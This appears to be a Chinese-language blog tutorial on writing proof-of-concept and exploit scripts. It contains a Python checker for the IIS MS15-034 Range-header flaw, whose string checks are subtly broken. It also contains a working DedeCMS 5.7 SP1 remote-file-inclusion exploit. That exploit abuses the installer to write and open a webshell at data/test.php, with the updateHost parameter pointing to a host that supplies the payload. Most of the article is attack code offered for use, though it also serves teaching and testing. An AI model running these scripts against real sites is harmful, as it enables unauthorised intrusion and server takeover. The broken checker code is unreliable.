POC-EXP编写

POC

一.概念

漏洞刚被批漏之后,有时候现有的工具里面是没有相应的poc的,那我们可以根据原理写出对应的poc代码,验证漏洞是否存在。

作用:用于漏洞验证,更加高效的快速挖掘漏洞,而不是手工测试,节省时间。

二.思维图解

  1. 深入了解漏洞原理
  2. 拼接payload到url中或者header头和cookies中(大多数情况都这样)
  3. 发起请求
  4. 通过响应头判断中间件和脚本版本
  5. 根据其漏洞特征,判断该漏洞是否存在

在这里插入图片描述

三.代码演示

import requests
a= input('请输入MS_15_034 IP或域名:')
url=a
#1.拼接payload到url中或者header头和cookies中
header={
    'Host': 'stuff',
    'Range': 'bytes=0-18446744073709551615'
}
#2.发起请求
r = requests.get(url,headers=header)
#3.通过响应头判断中间件和脚本版本
server = r.headers['Server']
if server.find('IIS/7.5') or server.find('IIS/8.0'):
#4.根据其漏洞特征,判断该漏洞是否存在
    if r.text.find('Requested Range Not Satisfiable'):
        print('find ms15_035')
    else:
        pass

else:
    print('no find')

附加类似的脚本参考
在这里插入图片描述

EXP

一.概念

漏洞刚被批漏之后,有时候现有的工具里面是没有相应的exp的,那我们可以根据原理写出对应的exp代码,验证漏洞是否存在。

作用:用于漏洞利用,更加高效的漏洞利用,而不是手工测试,节省时间。

二.思维图解

exp编写情况很多,所以了解漏洞原理以后,根据实际情况去编写exp

  1. 深入了解漏洞原理
  2. 创建发起攻击的payload
  3. 发起攻击请求
  4. 判断是否攻击成功

在这里插入图片描述

三.代码演示

织梦5.7 sp1远程文件包含getshell exp

# -*- coding:utf-8 -*-

import requests
import time

def dada(url):
    url_index=url+"/install/index.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
                            (KHTML, like Gecko) Chrome/51.0.    2704.103 Safari/537.36"}
    try:
        url_request=requests.get(url_index,headers)
        time.sleep(3)
        if(url_request.status_code==200):
            print("漏洞文件存在,开始测试")
            time.sleep(5)
            #创建发起攻击的payload
            url_url = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php"  # 重置其参数
            print(url_url)
            #发起攻击请求
            requests.get(url=url_url, headers=headers)  # 发送重置请求
            
			#创建发起攻击的payload
            url_url2 = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/test.php&updateHost=http://127.0.0.1/"  # 换成存在demodata.x.txt地址
            print(url_url2)
            #发起攻击请求
            requests.get(url=url_url2, headers=headers)  # 发送exp
            url_exp = url + "/data/test.php"
            url_final = requests.get(url=url_exp, headers=headers)
			#判断是否攻击成功
            if url_final.status_code == 200:
                print("攻击成功,请访问 \n "+url_exp)
            else:
                print("测试失败,请人工测试")
        else:
            print("检测完成,该漏洞不存在")

    except:
        print("error:请检测网络或者url地址")

    #print(url)

if __name__ == '__main__':
    dada("http://127.0.0.1/dede/dedecms")
  • 4
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值